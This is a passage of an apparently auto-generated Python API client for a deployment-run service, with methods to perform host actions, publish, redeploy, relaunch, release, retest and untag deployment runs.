        >>> thread = api.perform_host_action_with_http_info(id, deploymentrunhostid, action, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str deploymentrunhostid: ID of host (required)
        :param str action: Action to perform (required)
        :param int cpu: Desired number of CPUs, if resizing a host in a non-instance-type-based virtualization realm
        :param int ram: Desired amount of RAM in mebibytes, if resizing a host in a non-instance-type-based virtualization realm
        :param str instance_type_name: The instance type name to resize to, if resizing a host in an instance-type-based virtualization realm
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'deploymentrunhostid', 'action', 'cpu', 'ram', 'instance_type_name']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method perform_host_action" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `perform_host_action`")  # noqa: E501
        # verify the required parameter 'deploymentrunhostid' is set
        if self.api_client.client_side_validation and ('deploymentrunhostid' not in local_var_params or  # noqa: E501
                                                       local_var_params['deploymentrunhostid'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `deploymentrunhostid` when calling `perform_host_action`")  # noqa: E501
        # verify the required parameter 'action' is set
        if self.api_client.client_side_validation and ('action' not in local_var_params or  # noqa: E501
                                                       local_var_params['action'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `action` when calling `perform_host_action`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []
        if 'deploymentrunhostid' in local_var_params and local_var_params['deploymentrunhostid'] is not None:  # noqa: E501
            query_params.append(('deploymentrunhostid', local_var_params['deploymentrunhostid']))  # noqa: E501
        if 'action' in local_var_params and local_var_params['action'] is not None:  # noqa: E501
            query_params.append(('action', local_var_params['action']))  # noqa: E501
        if 'cpu' in local_var_params and local_var_params['cpu'] is not None:  # noqa: E501
            query_params.append(('cpu', local_var_params['cpu']))  # noqa: E501
        if 'ram' in local_var_params and local_var_params['ram'] is not None:  # noqa: E501
            query_params.append(('ram', local_var_params['ram']))  # noqa: E501
        if 'instance_type_name' in local_var_params and local_var_params['instance_type_name'] is not None:  # noqa: E501
            query_params.append(('instanceTypeName', local_var_params['instance_type_name']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/hostaction', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def publish_deployment_run(self, id, **kwargs):  # noqa: E501
        """Publish Deployment Run  # noqa: E501

        Publishes the specified Deployment as a Composition. Consumers will be able to connect to the run, but will not be able to manage the composition.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.publish_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.publish_deployment_run_with_http_info(id, **kwargs)  # noqa: E501

    def publish_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Publish Deployment Run  # noqa: E501

        Publishes the specified Deployment as a Composition. Consumers will be able to connect to the run, but will not be able to manage the composition.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.publish_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method publish_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `publish_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/publish', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def redeploy_container_asset(self, id, hostid, installationid, **kwargs):  # noqa: E501
        """Re-deploy Container Asset  # noqa: E501

        Re-deploys the specified Container Asset installation on the single Host in the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.redeploy_container_asset(id, hostid, installationid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str hostid: ID of host (required)
        :param str installationid: ID of container asset installation (required)
        :param InputContainerComponent input_container_component: The updated Container Component definition
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.redeploy_container_asset_with_http_info(id, hostid, installationid, **kwargs)  # noqa: E501
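
    # Illustrative sketch (assumes the package exposes an
    # InputContainerComponent model; ids and fields are hypothetical): an
    # updated component definition travels as the JSON request body.
    #
    #     component = InputContainerComponent()  # populate fields as needed
    #     ok = api.redeploy_container_asset('run-123', 'host-456', 'inst-789',
    #                                       input_container_component=component)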

    def redeploy_container_asset_with_http_info(self, id, hostid, installationid, **kwargs):  # noqa: E501
        """Re-deploy Container Asset  # noqa: E501

        Re-deploys the specified Container Asset installation on the single Host in the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.redeploy_container_asset_with_http_info(id, hostid, installationid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param str hostid: ID of host (required)
        :param str installationid: ID of container asset installation (required)
        :param InputContainerComponent input_container_component: The updated Container Component definition
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'hostid', 'installationid', 'input_container_component']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method redeploy_container_asset" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `redeploy_container_asset`")  # noqa: E501
        # verify the required parameter 'hostid' is set
        if self.api_client.client_side_validation and ('hostid' not in local_var_params or  # noqa: E501
                                                       local_var_params['hostid'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `hostid` when calling `redeploy_container_asset`")  # noqa: E501
        # verify the required parameter 'installationid' is set
        if self.api_client.client_side_validation and ('installationid' not in local_var_params or  # noqa: E501
                                                       local_var_params['installationid'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `installationid` when calling `redeploy_container_asset`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501
        if 'hostid' in local_var_params:
            path_params['hostid'] = local_var_params['hostid']  # noqa: E501

        query_params = []
        if 'installationid' in local_var_params and local_var_params['installationid'] is not None:  # noqa: E501
            query_params.append(('installationid', local_var_params['installationid']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'input_container_component' in local_var_params:
            body_params = local_var_params['input_container_component']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json', 'application/xml'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/host/{hostid}/container', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def redeploy_deployment_run_hosts(self, id, **kwargs):  # noqa: E501
        """Redeploy Deployment Run Hosts  # noqa: E501

        Requests the redeploy of one or more deployment run hosts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.redeploy_deployment_run_hosts(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param list[RestIdObject] rest_id_object: The collection of deployment run host ids to redeploy
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.redeploy_deployment_run_hosts_with_http_info(id, **kwargs)  # noqa: E501
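
    # Illustrative sketch (assumes a RestIdObject model whose constructor
    # accepts an id; ids are hypothetical): redeploy a subset of hosts by
    # sending their ids as the request body.
    #
    #     targets = [RestIdObject(id='host-1'), RestIdObject(id='host-2')]
    #     ok = api.redeploy_deployment_run_hosts('run-123',
    #                                            rest_id_object=targets)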

    def redeploy_deployment_run_hosts_with_http_info(self, id, **kwargs):  # noqa: E501
        """Redeploy Deployment Run Hosts  # noqa: E501

        Requests the redeploy of one or more deployment run hosts.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.redeploy_deployment_run_hosts_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param list[RestIdObject] rest_id_object: The collection of deployment run host ids to redeploy
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'rest_id_object']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method redeploy_deployment_run_hosts" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `redeploy_deployment_run_hosts`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'rest_id_object' in local_var_params:
            body_params = local_var_params['rest_id_object']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/redeployhosts', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def relaunch_deployment_run(self, id, **kwargs):  # noqa: E501
        """Relaunch Deployment Run  # noqa: E501

        Launches a new Deployment Run with the same configuration as the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.relaunch_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: str
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.relaunch_deployment_run_with_http_info(id, **kwargs)  # noqa: E501

    def relaunch_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Relaunch Deployment Run  # noqa: E501

        Launches a new Deployment Run with the same configuration as the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.relaunch_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(str, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method relaunch_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `relaunch_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/rerun', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='str',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def release_deployment_run(self, id, **kwargs):  # noqa: E501
        """Release Deployment Run  # noqa: E501

        Releases the Deployment Run for the ID provided. If the user is an Administrator, the force flag is honored. If the user is a non-Admin, the force flag is only honored in the event that a release request experiences an exception known to be resolved by a force.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.release_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param bool force: Force the release of this run
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.release_deployment_run_with_http_info(id, **kwargs)  # noqa: E501
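
    # Illustrative sketch (id hypothetical): try a plain release first and
    # fall back to force=True, which is always honored for administrators and,
    # for non-admins, only for failures known to be resolved by forcing.
    #
    #     released = api.release_deployment_run('run-123')
    #     if not released:
    #         released = api.release_deployment_run('run-123', force=True)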

    def release_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Release Deployment Run  # noqa: E501

        Releases the Deployment Run for the ID provided. If the user is an Administrator, the force flag is honored. If the user is a non-Admin, the force flag is only honored in the event that a release request experiences an exception known to be resolved by a force.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.release_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param bool force: Force the release of this run
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'force']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method release_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `release_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []
        if 'force' in local_var_params and local_var_params['force'] is not None:  # noqa: E501
            query_params.append(('force', local_var_params['force']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/release', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def remove_category_from_deployment_run(self, id, runid, **kwargs):  # noqa: E501
        """Unassign Category from deployment run  # noqa: E501

        Removes the Category as a filter tag from the provided Run. Altering the Category will affect future run filtering.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.remove_category_from_deployment_run(id, runid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of category (required)
        :param str runid: ID of run to unassign (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.remove_category_from_deployment_run_with_http_info(id, runid, **kwargs)  # noqa: E501

    def remove_category_from_deployment_run_with_http_info(self, id, runid, **kwargs):  # noqa: E501
        """Unassign Category from deployment run  # noqa: E501

        Removes the Category as a filter tag from the provided Run. Altering the Category will affect future run filtering.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.remove_category_from_deployment_run_with_http_info(id, runid, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of category (required)
        :param str runid: ID of run to unassign (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id', 'runid']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method remove_category_from_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `remove_category_from_deployment_run`")  # noqa: E501
        # verify the required parameter 'runid' is set
        if self.api_client.client_side_validation and ('runid' not in local_var_params or  # noqa: E501
                                                       local_var_params['runid'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `runid` when calling `remove_category_from_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []
        if 'runid' in local_var_params and local_var_params['runid'] is not None:  # noqa: E501
            query_params.append(('runid', local_var_params['runid']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/categories/{id}/run', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def retest_deployment_run(self, id, **kwargs):  # noqa: E501
        """Re-test Deployment Run  # noqa: E501

        Re-executes all Tests in the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.retest_deployment_run(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.retest_deployment_run_with_http_info(id, **kwargs)  # noqa: E501

    def retest_deployment_run_with_http_info(self, id, **kwargs):  # noqa: E501
        """Re-test Deployment Run  # noqa: E501

        Re-executes all Tests in the specified Deployment Run.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.retest_deployment_run_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str id: ID of deployment run (required)
        :param _return_http_data_only: return the response data only, without
                                       the status code and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        local_var_params = locals()

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method retest_deployment_run" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']

        # verify the required parameter 'id' is set
        if self.api_client.client_side_validation and ('id' not in local_var_params or  # noqa: E501
                                                       local_var_params['id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `id` when calling `retest_deployment_run`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in local_var_params:
            path_params['id'] = local_var_params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APIKeyHeader', 'Username']  # noqa: E501

        return self.api_client.call_api(
            '/api/drs/{id}/retest', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='bool',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)

    def set_deployment_run_lock(self, id, lock, **kwargs):  # noqa: E501
        """Update Lock  # noqa: E501

        Updates the Lock on a single Deployment Run with the given ID.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
